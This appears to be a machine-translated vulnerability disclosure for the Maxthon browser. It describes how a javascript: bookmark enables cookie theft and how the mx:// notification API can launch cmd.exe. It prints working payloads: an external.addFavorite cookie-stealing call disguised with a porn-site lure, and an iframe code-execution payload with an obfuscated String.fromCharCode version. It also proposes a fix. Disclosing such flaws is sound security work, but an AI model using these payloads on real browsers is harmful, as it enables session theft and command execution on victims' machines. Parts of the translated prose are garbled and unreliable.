Ao you Browser Remote Code Execution Vulnerability/Cookie Stealing

Ao you Browser Remote Code Execution Vulnerability/Cookie Stealing

Remote Code Execution (chicken ribs) can be caused by a poor function design)

We found that javascript: pseudo protocol can be directly added to the Ao you browser's favorites function and is opened in the current domain.
 

So there is a problem. If the current webpage is qq.com or baidu.com
 

Attackers can then open the url in the favorites area to execute the js Code of the current page domain.
 

In FireFox, we first open a about: blank and redirect it to the favorite address. This avoids this problem.

1. cookie Theft

How to add victims to favorites

Maxcompute supports external. addFavorite, while most browsers with similar webkit kernels are forbidden.

Run

external.addFavorite("javascript：alert(document.cookie)","TEST")

A dialog box is displayed.

This is one of the chicken ribs, but some websites can still be tempted by prompts like pornographic websites.

You can also execute malicious JavaScript code and then redirect it to a website to enhance concealment.

For example

External. addFavorite ("javascript: alert (document. cookie); location. href = \" http://www.wooyun.org/\ "", "I'm a porn website ")

2. Code Execution

Many people like to add a new Tab and click the address in the bookmarks.

The new tab of aoyou is mx: // there is more to do under the domain.
 

There is an api maxthon. program. Program. launch in mx: // res/notification /.

Executable command

You can directly call iframe mx: // res/notification /.

var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function(){s.contentWindow.maxthon.program.Program.launch("C:/windows/system32/cmd.exe","")};document.body.appendChild(s);

Encode
 

String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 105, 102, 114, 97, 109, 101, 34, 41, 59, 115, 46, 115, 114, 99, 61, 34, 109, 120, 58, 47, 47, 114, 101, 115, 47, 110, 111, 116, 105, 102, 105, 99, 97, 116, 105, 111, 110, 47, 34, 59, 115, 46, 111, 110, 108, 111, 97, 100, 61, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 10, 10, 123, 115, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 109, 97, 120, 116, 104, 111, 110, 46, 112, 114, 111, 103, 114, 97, 109, 46, 80, 114, 111, 103, 114, 97, 109, 46, 108, 97, 117, 110, 99, 104, 40, 34, 67, 58, 47, 119, 105, 110, 100, 111, 119, 115, 47, 115, 121, 115, 116, 101, 109, 51, 50, 47, 99, 109, 100, 46, 101, 120, 101, 34, 44, 34, 34, 41, 125, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59)

Cmd is successfully executed.

Then you can write a phishing poc.

You only need to click mx: // to execute the command, for example, history.
 

 

After malicious code is executed, redirection to a website user will be considered as a normal bookmark.

Solution:

Refer to FireFox. When a user opens a bookmark, a blank page is opened before redirection.